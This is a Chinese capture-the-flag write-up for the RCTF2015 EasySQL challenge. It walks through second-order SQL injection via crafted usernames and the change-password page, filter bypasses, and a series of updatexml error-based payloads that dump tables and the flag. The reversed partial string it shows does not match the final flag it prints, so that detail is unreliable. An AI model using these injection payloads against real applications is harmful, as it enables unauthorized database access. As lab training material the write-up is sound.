[RCTF2015]EasySQL 1

[RCTF2015]EasySQL 1

在这里插入图片描述
进入环境,发现注册页面和登录页面
我们尝试进行注册admin,页面回显用户存在,第一时间就想到了二次注入。
注册 admin"#,登录后更改密码,成功。登录admin ,发现和普通有用户没有区别。
在这里插入图片描述
之后就是寻找注入点,只有登陆界面,注册界面和changepwd界面可能存在存在sql注入。

我们知道二次注入主要是 插入恶意数据和引用恶意数据。
注册界面主要是进行一个插入数据,肯定需要一个界面进行恶意数据的引用。
我们在注册界面输入恶意数据分别进行尝试
尝试后发现,登录界面只能进行一个登录发 所以,我们可以肯定 在本关一定需要利用changepwd.php配合进行。

同时在注册页面发现过滤掉了很多字符,像 空格, . ,and,or,union
页面回显 invalid string!

注册用户123"||' 更改密码

123"||'

在这里插入图片描述
发现页面报错,所以在本关我们可以尝试使用 报错注入

剩下的就比较常规

查询库名

123"||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#

在这里插入图片描述

爆表名

123"||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),0x7e),1))#

在这里插入图片描述

爆列名

123"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1))#

在这里插入图片描述

爆flag

123"||(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e),1))#

在这里插入图片描述
flag
不在这里
爆其他 表名

爆users表

123"||(updatexml(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1))#

在这块儿,我没有加 0x7e(~) 加上后 反而爆不出来 有没有大佬知道这是为什么
在这里插入图片描述
regexp 正则表达式匹配 由于报错注入的长度限制 需要使用正则表达式
那么直接去查 real_flag_1s_here 这一列 为xxxxxxxxxxxxxx
由于长度的限制导致
用正则表达式匹配 flag 可以得到一半的 flag

123"||(updatexml(1,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')),1))#

在这里插入图片描述

使用reverse函数 将字符逆序输出

123"||(updatexml(1,concat('~',reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

在这里插入图片描述

s= '~}1d5ebc521f44-2f7b-b2a4-63a2-30'
s=s[::-1]
print(s)

)

拼接flag

flag{b68e6065-e226-4a87-9203-779144e092b9}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值